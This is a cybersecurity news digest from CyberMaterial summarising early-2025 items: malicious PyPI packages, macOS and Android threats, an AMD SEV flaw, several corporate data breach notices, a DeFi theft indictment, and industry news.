👉 What’s the latest in the cyber world today?

Malicious PyPI Packages, Data Harvesting Tools, FlexibleFerret Malware, macOS, Apple XProtect Detection, Google Patch, Android Kernel, Zero-Day, ValleyRAT, Finance Departments, AMD Secure Encrypted Virtualization, Microcode Loading, Grubhub Hack, Personal Data, Mizuno USA, Data Breach, Magic Vacation Title, O’Connor Corporation, DFB Sales, Sensitive Employee Information, Musk Task Force, Sensitive Government Systems, Canada, DeFi Platforms, Exploited Vulnerabilities, Cyber Threats, Australia, Sanctions, Terrorgram, Riot, Funding, Cybersecurity Training, Employee Risks

Listen to the full podcast

🚨 Cyber Alerts

1. Malicious PyPI Packages Harvest User Data

Two malicious Python packages, deepseeek and deepseekai, were found on the PyPI repository, designed to collect sensitive user data and environment variables. These packages targeted developers, especially those in AI and machine learning, by exploiting their interest in trending tools. When activated, they gathered crucial data like API keys, credentials, and access tokens, then transmitted it to a command-and-control server using the Pipedream platform.

2. ​​FlexibleFerret Malware Targets macOS Users

A new malware variant named FlexibleFerret has been discovered targeting macOS users, bypassing Apple’s XProtect tool. Part of a broader campaign linked to North Korean threat actors, this malware is disguised as legitimate software for virtual interviews, tricking job seekers and developers into installing it. Despite recent updates to XProtect, FlexibleFerret remains undetected, continuing its stealthy distribution through fake installer packages like versus.pkg.

3. Google Patches Critical Android Kernel Flaw

The February 2025 Android security updates address 48 vulnerabilities, including a zero-day kernel flaw (CVE-2024–53104) actively exploited in the wild. The update also resolves a critical issue in Qualcomm’s WLAN component (CVE-2024–45569), which allows remote attackers to execute arbitrary code or trigger crashes. Android devices like Google Pixel will receive immediate updates, while other vendors will take longer to roll out fixes.

4. ValleyRAT Trojan Targets Finance Departments

Cybersecurity experts have reported an increase in cyberattacks involving ValleyRAT, a Remote Access Trojan (RAT) linked to the Silver Fox APT group. This sophisticated malware targets finance and accounting departments, leveraging advanced delivery techniques to infiltrate organizational networks. Recent updates reveal that attackers now use fake software mimicking legitimate applications to deliver the malware, often through phishing websites or counterfeit domains.

5. AMD SEV Flaw Exposes Confidential Data

A security vulnerability has been discovered in AMD’s Secure Encrypted Virtualization (SEV) feature, which could allow an attacker with local administrator privileges to load malicious CPU microcode. The flaw, tracked as CVE-2024–56161, has a high severity rating of 7.2 out of 10.0 and could compromise the confidentiality and integrity of virtual machines running under SEV-SNP. The vulnerability stems from improper signature verification in AMD’s CPU ROM microcode patch loader, which could expose confidential workloads to compromise.

💥 Cyber Incidents

6. Grubhub Discloses Breach Impacting Users

Grubhub, a major U.S. food delivery service, confirmed that hackers accessed the personal data of customers, merchants, and drivers due to a breach in its internal systems. The breach, linked to unauthorized access through a third-party service provider, led to the exposure of names, email addresses, phone numbers, and partial payment card details. Grubhub acted quickly to terminate the compromised account and remove the provider from its systems, though it has not disclosed the number of affected individuals or when the breach occurred.

7. Mizuno USA Confirms Data Breach and Theft

Mizuno USA has confirmed a data breach resulting from a cyberattack that occurred in late 2024. The breach, discovered in November 2024, involved hackers exfiltrating sensitive data from the company’s network over a period of two months, between August 21, 2024, and October 29, 2024. The stolen information includes personal details such as names, Social Security numbers, financial account information, driver’s license information, and passport numbers.

8. MVT Notifies Customers of Potential Breach

Magic Vacation Title (MVT) recently informed its customers about a potential data breach caused by unauthorized activity in its third-party IT provider’s network. The incident, which was detected around July 23, 2024, led to a thorough investigation and a detailed review of the impacted files. While MVT found no evidence of fraudulent misuse of the data, they have proactively taken steps to enhance their network security. As a precaution, the company is offering complimentary credit monitoring services to affected individuals and advising them to monitor their credit reports and bank statements for any signs of suspicious activity.

9. O’Connor Corporation Reports Data Breach

O’Connor Corporation informed the Maine Attorney General of a data breach that may have involved sensitive personal information. The breach, discovered on December 2, 2024, resulted from a network disruption that allowed unauthorized access to certain systems. Upon investigation, the company determined that from November 23 to December 1, 2024, personal data, including names, Social Security numbers, and financial details, was potentially compromised.

10. DFB Sales Reports Breach Affecting Employees

DFB Sales, Inc. recently reported a data breach that may have exposed sensitive personal information of its employees. The breach was detected on December 27, 2024, after unauthorized activity was found on DFB’s computer network. Upon investigation, DFB determined that an unauthorized third party accessed the company’s systems, potentially compromising personal data including names and Social Security numbers.

📢 Cyber News

11. Musk Force Gov Access Sparks Cyber Alarm

Reports have surfaced that a task force led by Elon Musk gained access to sensitive U.S. government systems, raising serious concerns in the cybersecurity community. The task force, operating under the Department of Government Efficiency, reportedly locked out career civil servants from critical systems and accessed sensitive data from the Department of Treasury, including Social Security and Medicare payment systems. This access could undermine years of progress made in securing federal networks, with experts warning of significant risks if the system’s safeguards are compromised.

12. Canadian Charged With Stealing 65 Million

The U.S. Justice Department has charged Andean Medjedovic, a Canadian man, with stealing $65 million by exploiting two decentralized finance (DeFi) platforms. Medjedovic allegedly took advantage of vulnerabilities in smart contracts used by KyberSwap and Indexed Finance, draining millions in digital assets from various liquidity pools. He is now facing multiple charges, including wire fraud and money laundering, with the possibility of serving up to 20 years in prison if convicted.

13. Exploited Vulnerabilities Rise 20% in 2024

In 2024, the number of vulnerabilities exploited in the wild reached 768, a 20% rise from 639 in 2023. VulnCheck reported that 23.6% of these known exploited vulnerabilities were weaponized on or before their CVE public disclosure date. The report highlights that while exploitation can occur anytime during a vulnerability’s lifecycle, 1% of CVEs published in 2024 were discovered to have been exploited in the wild, a figure expected to increase over time.

14. Australia Sanctions White Supremacist Group

Australia has sanctioned the white supremacist online network Terrorgram in response to growing concerns about antisemitism and violent extremism. This move follows similar actions by the U.S. and the U.K., marking the first time Australia has sanctioned an entirely online entity. The sanctions aim to cut off Terrorgram’s access to resources that could support its operations, including funding and recruitment for violent acts. Violation of these sanctions could result in severe penalties, including prison time and hefty fines.

15. Riot Raises $30M for Cybersecurity Training

Riot, a French cybersecurity startup, secured a $30 million Series B funding round, aiming to minimize the attack surface for employees. The company initially focused on training staff through phishing simulations and educational content, now enhanced by a chatbot. With the new funding, Riot is positioned to expand its impact, already reaching 1 million employees across 1,500 companies, including L’Occitane and Le Monde.

Copyright © 2025 CyberMaterial. All Rights Reserved.